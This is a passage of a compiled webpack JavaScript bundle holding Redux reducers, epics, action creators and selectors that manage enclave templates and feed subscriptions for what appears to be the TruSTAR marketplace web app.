    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["h" /* SAVE_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["c" /* DELETE_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["b" /* DELETE_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_3_modules_icons_action_types_js__["f" /* SAVE_TEMPLATE_ICON_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_3_modules_icons_action_types_js__["e" /* SAVE_TEMPLATE_ICON_FAILURE */]:
      return false;
    default:
      return state;
  }
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__["combineReducers"])({
  templates: templates,
  loading: loading,
  options: options
}));

/***/ }),
/* 2926 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export listToOrderedMap */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs__ = __webpack_require__(14);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_rxjs__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_redux_observable__ = __webpack_require__(15);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__types__ = __webpack_require__(344);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__types_js__ = __webpack_require__(344);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7__action_types_js__ = __webpack_require__(498);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_modules_icons_action_types_js__ = __webpack_require__(177);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9__actions__ = __webpack_require__(714);








var debug = __WEBPACK_IMPORTED_MODULE_2_debug___default()('app:modules:templates:epics'); // eslint-disable-line no-unused-vars







var listToOrderedMap = function listToOrderedMap(list) {
  return Object(__WEBPACK_IMPORTED_MODULE_3_immutable__["fromJS"])(list).toOrderedMap().mapKeys(function (k, v) {
    return v.get('id');
  });
};

var fetchEpic = function fetchEpic(action$, store, _ref) {
  var ajax = _ref.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_7__action_types_js__["d" /* FETCH */]).mergeMap(function () {
    return ajax.get(__WEBPACK_IMPORTED_MODULE_6__types_js__["a" /* ENCLAVE_TEMPLATES_ENDPOINT */]).map(Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["prop"])('response')).map(listToOrderedMap).map(function (templates) {
      return {
        type: __WEBPACK_IMPORTED_MODULE_7__action_types_js__["f" /* FETCH_SUCCESS */],
        payload: templates
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_7__action_types_js__["e" /* FETCH_FAILURE */],
        error: true,
        payload: err
      });
    });
  });
};

var saveTemplateEpic = function saveTemplateEpic(action$, store, _ref2) {
  var ajax = _ref2.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_7__action_types_js__["g" /* SAVE */]).mergeMap(function (_ref3) {
    var payload = _ref3.payload;

    return ajax.postJSON('' + __WEBPACK_IMPORTED_MODULE_6__types_js__["a" /* ENCLAVE_TEMPLATES_ENDPOINT */], payload).map(Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["prop"])('response')).mergeMap(function (payload) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_7__action_types_js__["i" /* SAVE_SUCCESS */],
        payload: Object(__WEBPACK_IMPORTED_MODULE_5__types__["d" /* fromJson */])(payload),
        meta: {
          alert: { type: 'success', text: 'Template saved successfully.' }
        }
      });
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_7__action_types_js__["h" /* SAVE_FAILURE */],
        meta: {
          error: true,
          payload: err,
          alert: { type: 'error', text: 'Template could not be saved. ' + Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["path"])(['xhr', 'response', 'message'], err) }
        }
      });
    });
  });
};

var deleteTemplateEpic = function deleteTemplateEpic(action$, store, _ref4) {
  var ajax = _ref4.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_7__action_types_js__["a" /* DELETE */]).mergeMap(function (_ref5) {
    var id = _ref5.payload;

    return ajax.delete(__WEBPACK_IMPORTED_MODULE_6__types_js__["a" /* ENCLAVE_TEMPLATES_ENDPOINT */] + '/' + id).mergeMap(function (_ref6) {
      var response = _ref6.response;

      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_7__action_types_js__["c" /* DELETE_SUCCESS */],
        payload: id,
        meta: {
          alert: { type: 'success', text: 'Template deleted. Companies and users will no longer have access to it.' }
        }
      });
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_7__action_types_js__["b" /* DELETE_FAILURE */],
        meta: {
          alert: { type: 'error', text: 'Template could not be deleted. Please reload this page and try again' }
        }
      });
    });
  });
};

var saveTemplateIconEpic = function saveTemplateIconEpic(action$, store, _ref7) {
  var ajax = _ref7.ajax;
  return (
    // first, consume a SAVE event, meaning an enclave is being saved
    action$.ofType(__WEBPACK_IMPORTED_MODULE_7__action_types_js__["g" /* SAVE */]).switchMap(function (_ref8) {
      var meta = _ref8.meta;
      return (
        // wait until a the enclave is saved successfully
        action$.ofType(__WEBPACK_IMPORTED_MODULE_7__action_types_js__["i" /* SAVE_SUCCESS */]).take(1).mergeMap(function (_ref9) {
          var payload = _ref9.payload;


          // dispatch a SAVE_ENCLAVE_ICON event, combining the enclave GUID
          // from the SAVE_SUCCESS event and the file from the SAVE event
          // Note --  SVG and regular icons updated in seperate calls
          var filesToSave = [];
          if (meta.file) filesToSave.push(meta.file);
          if (meta.sourceSVGFile) filesToSave.push(meta.sourceSVGFile);

          return filesToSave.length > 0 ? filesToSave.map(function (iconFile) {
            return Object(__WEBPACK_IMPORTED_MODULE_9__actions__["saveEnclaveTemplateIcon"])(payload.id, iconFile);
          }) : __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].empty();
        })
        // break the flow if the enclave fails to save
        .takeUntil(action$.ofType(__WEBPACK_IMPORTED_MODULE_7__action_types_js__["h" /* SAVE_FAILURE */]))
      );
    })
  );
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_1_redux_observable__["combineEpics"])(fetchEpic, saveTemplateEpic, deleteTemplateEpic, saveTemplateIconEpic));

/***/ }),
/* 2927 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchTemplates", function() { return fetchTemplates; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchSubscriptions", function() { return fetchSubscriptions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchSubscriptionsByCompany", function() { return fetchSubscriptionsByCompany; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "activate", function() { return activate; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "emailActivate", function() { return emailActivate; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "adminUnsubscribe", function() { return adminUnsubscribe; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "setDisplayOptions", function() { return setDisplayOptions; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__action_types_js__ = __webpack_require__(357);

var debug = __WEBPACK_IMPORTED_MODULE_0_debug___default()('app:modules:subscription-management:actions'); // eslint-disable-line no-unused-vars



/**
 * Fetch all templates in the system
 * Used by TruSTAR Admins to manage subscriptions on Marketplace.
 */
var fetchTemplates = function fetchTemplates() {
  return { type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["p" /* FETCH_TEMPLATES */] };
};

/**
 * Fetch all pending and active subscriptions for companies.
 * Used by TruSTAR Admins to manage subscriptions on Marketplace.
 */
var fetchSubscriptions = function fetchSubscriptions() {
  return { type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["m" /* FETCH_SUBSCRIPTIONS */] };
};

var fetchSubscriptionsByCompany = function fetchSubscriptionsByCompany(companyGuid) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["j" /* FETCH_COMPANY_SUBSCRIPTIONS */],
    payload: {
      companyGuid: companyGuid
    }
  };
};

/**
 * Activate the subscription for the given enclave and company.
 * Used by TruSTAR Admins to activate credential subscriptions
 * on Marketplace.
 */
var activate = function activate(enclaveGuid, companyGuid) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["a" /* ACTIVATE */],
    payload: {
      enclaveGuid: enclaveGuid,
      companyGuid: companyGuid
    }
  };
};

/**
 * Send email activation notice for the given enclave and company.
 * Used by TruSTAR Admins to activate credential subscriptions
 * on Marketplace.
 */
var emailActivate = function emailActivate(enclaveGuid, companyGuid) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["g" /* EMAIL_ACTIVATE */],
    payload: {
      enclaveGuid: enclaveGuid,
      companyGuid: companyGuid
    }
  };
};

/**
 * Similar functionality to regular unsubscribe but this one is only available to admins who have access
 * to subscription management
 */
var adminUnsubscribe = function adminUnsubscribe(feedGuid, companyGuid, requiredState) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["d" /* ADMIN_UNSUBSCRIBE */],
    payload: {
      feedGuid: feedGuid,
      companyGuid: companyGuid,
      requiredState: requiredState
    }
  };
};

/**
 * Set display options. Determines sorting and filtering of Subscriptions.
 */
var setDisplayOptions = function setDisplayOptions(options) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["s" /* SET_DISPLAY_OPTIONS */],
    payload: options
  };
};

/***/ }),
/* 2928 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "managedSubscriptionsMap", function() { return managedSubscriptionsMap; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "loading", function() { return loading; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "displayOptions", function() { return displayOptions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "allManagedSubs", function() { return allManagedSubs; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "allManagedSubsList", function() { return allManagedSubsList; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "managedSubscription", function() { return managedSubscription; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getSubscriptionFormValues", function() { return getSubscriptionFormValues; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reselect__ = __webpack_require__(34);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reselect___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_reselect__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_lodash_isstring__ = __webpack_require__(81);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_lodash_isstring___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_lodash_isstring__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_lodash_escaperegexp__ = __webpack_require__(123);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_lodash_escaperegexp___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_lodash_escaperegexp__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_modules_marketplace_getters_js__ = __webpack_require__(1313);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_modules_subscription_management_types_js__ = __webpack_require__(717);







// export const templatesMap = getterFromKeyPath(['subscription-management', 'templates']);
var managedSubscriptionsMap = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['subscriptionManagement', 'managedSubscriptions']);
var loading = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['subscriptionManagement', 'loading']);
var displayOptions = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['subscriptionManagement', 'options']);

/* Grabs all the managed subscriptions,
as an OrderedMap of ManagedSubscription Records */
var allManagedSubs = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([__WEBPACK_IMPORTED_MODULE_5_modules_marketplace_getters_js__["allFeedsAndSubs"], managedSubscriptionsMap], function (subscribebabbles, managedSubscriptions) {
  var result = new __WEBPACK_IMPORTED_MODULE_2_immutable__["List"]();
  if (managedSubscriptions && managedSubscriptions.size > 0) {
    // filter thru the ManagedSubscriptions to grab only the ones that require credentials/activation
    // go thru the managedSubscriptions and see if by the feedGuid, there is a corresponding subscription with that feedGuid

    // managedSubscriptions is a Map<feedGuid, List<Map>>
    result = managedSubscriptions.map(function (feed) {
      return feed.map(function (f) {
        var sub = subscribebabbles.get(f.get('feedGuid'));
        // if there is a corresponding sub: grab its relevant properties, and use them along with
        // the feed properties to create the ManagedSubscription Record
        return Object(__WEBPACK_IMPORTED_MODULE_6_modules_subscription_management_types_js__["b" /* ManagedSubscription */])({
          feedGuid: f.get('feedGuid'),
          maximumAccess: sub.maximumAccess,
          name: sub.name,
          iconUrl: sub.iconUrl,
          description: sub.description,
          credentialsType: sub.credentialsType,
          externalUrl: sub.externalUrl,
          label: sub.label,
          created: sub.created,
          updated: sub.updated,
          enclaveGuid: f.get('enclaveGuid'),
          companyGuid: f.get('companyGuid'),
          companyName: f.get('companyName'),
          state: f.get('state'),
          lastPulled: sub.lastPulled
        });
      });
    });
  }
  return result;
});

/* From all the managed subscriptions, puts them in a list
and grabs the ones that actually require credentials */
var allManagedSubsList = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([allManagedSubs], function (managed) {
  var result = new __WEBPACK_IMPORTED_MODULE_2_immutable__["List"]();
  if (managed && managed.size > 0) {
    result = managed.toList();
  }
  return result;
});

/* Grab a specific managed subscription, based on the guid  */
var managedSubscription = function managedSubscription(guid) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(managedSubscriptionsMap, function (subs) {
    if (subs !== null) {
      return subs.get(guid);
    }
  });
};

/* Generate initial form values for save/edit enclave subscription modal */
var getSubscriptionFormValues = function getSubscriptionFormValues(guid) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(managedSubscription(guid), function (sub) {
    return sub.get('credentials');
  });
};

/***/ }),
/* 2929 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchSubscriptions", function() { return fetchSubscriptions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "unsubscribe", function() { return unsubscribe; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__action_types_js__ = __webpack_require__(716);

var debug = __WEBPACK_IMPORTED_MODULE_0_debug___default()('app:modules:subscriptions:actions'); // eslint-disable-line no-unused-vars



/**
 * Fetch all pending and active subscriptions for companies.
 * Used by anyone to see everything they are subscribed to.
 */
var fetchSubscriptions = function fetchSubscriptions() {
  return { type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["a" /* FETCH_SUBSCRIPTIONS */] };
};

/**
 * Unsubscribe user from a data feed that. Used by anyone to unfollow
 * a specific feed.
 */
var unsubscribe = function unsubscribe(guid, requiredState, origin) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["d" /* UNSUBSCRIBE */],
    payload: { guid: guid, requiredState: requiredState, origin: origin }
  };
};

/***/ }),
/* 2930 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "templatesMap", function() { return templatesMap; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "subscriptionsMap", function() { return subscriptionsMap; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "loading", function() { return loading; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "displayOptions", function() { return displayOptions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "templates", function() { return templates; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "template", function() { return template; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "subscription", function() { return subscription; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getSubscriptionFormValues", function() { return getSubscriptionFormValues; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reselect__ = __webpack_require__(34);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reselect___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_reselect__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_lodash_isstring__ = __webpack_require__(81);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_lodash_isstring___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_lodash_isstring__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_lodash_escaperegexp__ = __webpack_require__(123);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_lodash_escaperegexp___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_lodash_escaperegexp__);






var templatesMap = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['subscriptions', 'templates']);
var subscriptionsMap = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['subscriptions', 'subscriptions']);
var loading = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['subscriptions', 'loading']);
var displayOptions = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['subscriptions', 'options']);

var templates = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([templatesMap, displayOptions], function (subs, options) {
  var result = subs;

  var query = options.get('query');
  if (query) {
    result = result.filter(function (enclave) {
      var regex = new RegExp(__WEBPACK_IMPORTED_MODULE_4_lodash_escaperegexp___default()(query), 'i');

      // Test all top-level string values
      return enclave.valueSeq().filter(__WEBPACK_IMPORTED_MODULE_3_lodash_isstring___default.a).some(function (x) {
        return x.search(regex) > -1;
      });
    });
  }
  return result.toList();
});

var template = function template(id) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(templatesMap, function (templates) {
    return templates.get(id);
  });
};

var subscription = function subscription(id) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(subscriptionsMap, function (enclaves) {
    return enclaves.get(id);
  });
};

/* Generate initial form values for save/edit enclave subscription modal */
var getSubscriptionFormValues = function getSubscriptionFormValues(id) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(subscription(id), function (sub) {
    return sub.get('credentials');
  });
};

/***/ }),
/* 2931 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export loading */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable__ = __webpack_require__(20);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__action_types_js__ = __webpack_require__(716);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_modules_subscription_management_action_types_js__ = __webpack_require__(357);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__types_js__ = __webpack_require__(499);










var listToOrderedMap = function listToOrderedMap(list) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["fromJS"])(list).toOrderedMap().map(__WEBPACK_IMPORTED_MODULE_4__types_js__["Subscription"]).mapKeys(function (k, v) {
    return v.get('feedGuid');
  });
};

var subscriptions = function subscriptions() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["OrderedMap"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["c" /* FETCH_SUBSCRIPTIONS_SUCCESS */]:
      return listToOrderedMap(payload);
    case __WEBPACK_IMPORTED_MODULE_3_modules_subscription_management_action_types_js__["c" /* ACTIVATE_SUCCESS */]:
      return state.setIn([payload.feedGuid, 'state'], payload.state);
    default:
      return state;
  }
};

var loading = function loading() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : true;
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["a" /* FETCH_SUBSCRIPTIONS */]:
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["d" /* UNSUBSCRIBE */]:
      return true;
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["c" /* FETCH_SUBSCRIPTIONS_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["b" /* FETCH_SUBSCRIPTIONS_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["f" /* UNSUBSCRIBE_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["e" /* UNSUBSCRIBE_FAILURE */]:
      return false;
    default:
      return state;
  }
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__["combineReducers"])({
  subscriptions: subscriptions,
  loading: loading
}));

/***/ }),
/* 2932 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs__ = __webpack_require__(14);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_rxjs__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_redux_observable__ = __webpack_require__(15);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__types_js__ = __webpack_require__(499);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__action_types_js__ = __webpack_require__(716);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_modules_data_feeds_action_types_js__ = __webpack_require__(496);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_modules_subscription_management_action_types_js__ = __webpack_require__(357);





var debug = __WEBPACK_IMPORTED_MODULE_2_debug___default()('app:modules:subscriptions:epics'); // eslint-disable-line no-unused-vars









/** Fetch all Subscriptions a user has access it  */
var fetchSubscriptionsEpic = function fetchSubscriptionsEpic(action$, store, _ref) {
  var ajax = _ref.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_5__action_types_js__["a" /* FETCH_SUBSCRIPTIONS */], __WEBPACK_IMPORTED_MODULE_6_modules_data_feeds_action_types_js__["f" /* SUBSCRIBE_SUCCESS */], __WEBPACK_IMPORTED_MODULE_5__action_types_js__["f" /* UNSUBSCRIBE_SUCCESS */], __WEBPACK_IMPORTED_MODULE_7_modules_subscription_management_action_types_js__["c" /* ACTIVATE_SUCCESS */]).mergeMap(function () {
    return ajax.get('' + __WEBPACK_IMPORTED_MODULE_4__types_js__["SUBSCRIPTIONS_ENDPOINT"]).map(function (_ref2) {
      var response = _ref2.response;
      return {
        type: __WEBPACK_IMPORTED_MODULE_5__action_types_js__["c" /* FETCH_SUBSCRIPTIONS_SUCCESS */],
        payload: response
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_5__action_types_js__["b" /* FETCH_SUBSCRIPTIONS_FAILURE */],
        error: true,
        payload: err
      });
    });
  });
};

/** Unsubscribe to a specific subscription, based on its feedGuid and requiredState (ACTIVE or CANCEL)  */
var unsubscribeEpic = function unsubscribeEpic(action$, store, _ref3) {
  var ajax = _ref3.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_5__action_types_js__["d" /* UNSUBSCRIBE */]).mergeMap(function (_ref4) {
    var _ref4$payload = _ref4.payload,
        guid = _ref4$payload.guid,
        requiredState = _ref4$payload.requiredState,
        origin = _ref4$payload.origin;
    return ajax.post(Object(__WEBPACK_IMPORTED_MODULE_3_trustar_utils__["querystring"])({ origin: origin, requiredState: requiredState }, __WEBPACK_IMPORTED_MODULE_4__types_js__["SUBSCRIPTIONS_ENDPOINT"] + '/' + guid + '/unsubscribe')).map(function (_ref5) {
      var response = _ref5.response;
      return {
        type: __WEBPACK_IMPORTED_MODULE_5__action_types_js__["f" /* UNSUBSCRIBE_SUCCESS */],
        payload: response,
        meta: {
          alert: { type: 'success', text: 'Successfully unsubscribed.' }
        }
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_5__action_types_js__["e" /* UNSUBSCRIBE_FAILURE */],
        payload: err,
        meta: {
          alert: { type: 'error', text: 'An error occurred while unsubscribing.' }
        }
      });
    });
  });
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_1_redux_observable__["combineEpics"])(fetchSubscriptionsEpic, unsubscribeEpic));

/***/ }),
/* 2933 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export templates */
/* unused harmony export loading */
/* unused harmony export options */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable__ = __webpack_require__(20);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_modules_templates_action_types_js__ = __webpack_require__(498);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__action_types_js__ = __webpack_require__(357);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__types_js__ = __webpack_require__(717);

// import {List} from 'csso';









var listToOrderedMap = function listToOrderedMap(list) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["fromJS"])(list).toOrderedMap();
};

var templates = function templates() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["OrderedMap"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;

  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["r" /* FETCH_TEMPLATES_SUCCESS */]:
      return listToOrderedMap(payload);
    default:
      return state;
  }
};

var managedSubscriptions = function managedSubscriptions() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["OrderedMap"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["l" /* FETCH_COMPANY_SUBSCRIPTIONS_SUCCESS */]:
      return Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["fromJS"])(payload).groupBy(function (x) {
        return x.get('feedGuid');
      });
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["c" /* ACTIVATE_SUCCESS */]:
      var subList = state.get(payload.feedGuid);
      return state.set(payload.feedGuid, subList.push(Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["fromJS"])(payload)));
    default:
      return state;
